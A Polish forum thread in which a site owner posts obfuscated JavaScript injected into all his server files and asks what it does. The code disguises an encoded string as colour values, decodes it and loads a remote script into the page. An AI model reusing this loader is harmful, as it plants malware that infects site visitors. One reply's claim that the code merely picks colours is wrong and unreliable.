Trojan zaatakował pliki na serwerze Opcje

[ookris]

Witam.
Dzisiaj po uruchomieniu jednej z moich stron Avast zakomunikował mi iż zablokował połączenie z stroną www z powodu wykrycia trojana.
Po otwarciu zainfekowanych plików (*.js, *.html, *.php) znalazłem tam taki oto kod:

Kod

if (typeof(redef_colors)=="undefined") {

   var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
   var redef_colors = 1;
   var colors_picked = 0;

   function div_pick_colors(t,styled) {
    var s = "";
    for (j=0;j<t.length;j++) {    
        var c_rgb = t[j];
        for (i=1;i<7;i++) {
            var c_clr = c_rgb.substr(i++,2);
            if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
        }
    }
    if (styled) {
        s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
    } else {
        s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
    }
    return s;
   }

   function try_pick_colors() {
    try {
           if(!document.getElementById || !document.createElement){
            document.write(div_pick_colors(div_colors,1));
           } else {
            var new_cstyle=document.createElement("script");
            new_cstyle.type="text/javascript";
            new_cstyle.src=div_pick_colors(div_colors,0);
            document.getElementsByTagName("head")[0].appendChild(new_cstyle);
        }
    } catch(e) { }
    try {
        check_colors_picked();
    } catch(e) {
        setTimeout("try_pick_colors()", 500);
    }
   }

   try_pick_colors();

}

jak ustrzec się przed tego typu atakami oraz co robi ten kod?

[nekomata]

Ciekawe jak ktoś ci tego trojana wrzucil na serwer , ogólnie avast to taki antywirus co znajduję wirusy tam gdzie ich niema , a tam gdzie są to ich nie widzi , ja bym obstawiał że samemu coś ściągałeś wcześniej i wklejałeś do swoich plików ,"kopiuj&wklej" a teraz myślisz że to wirus. A skrypt wygląda tak Zapisuję funkcję która losuje kolory , potem jeśli nie istnieje div to go tworzy i nadaję mu kolor wcześniej wylosowany.

[Hekko]

1. Masz trojana w komputerze, który wykradł hasło z FTP.
2. Dziurawy skrypt.
3. Dziura na serwerze.

Jedyne 3 opcje. Sprawdź je.

Ten post edytował Hekko 29.03.2011, 14:13:32

[ookris]

to raczej nie ja bo wszystkie strony na serwerze nie działają i każdy plik zawiera ten kod. Już napisałem do administratora serwera z prośbą o przywrócenie kopi plików.

[Hekko]

Jeśli wszystkie strony na Twoim koncie nie działają, to jest to patrz wyżej. Sprecyzuj co oznacza "wszystkie". Co to za serwer?

[wszerad]

Podobno miał miejsce gigantyczny atak SQL injection na serwery wykorzystujące bazy danych MS. Atak jest nie groźny bo zachęca tylko do pobrania niebezpiecznego antywirusa. Podobno 1.5mln stron oberwało, według Google

Ten post edytował wszerad 1.04.2011, 15:05:12

[amii]

A skrypt wygląda tak Zapisuję funkcję która losuje kolory , potem jeśli nie istnieje div to go tworzy i nadaję mu kolor wcześniej wylosowany.

Ten skrypt nie losuje kolorów a dla ciekawych co losuje mogą sobie zobaczyć tu podklejając kod -> http://www.w3schools.com/jsref/tryit.asp?f...ef_fromcharcode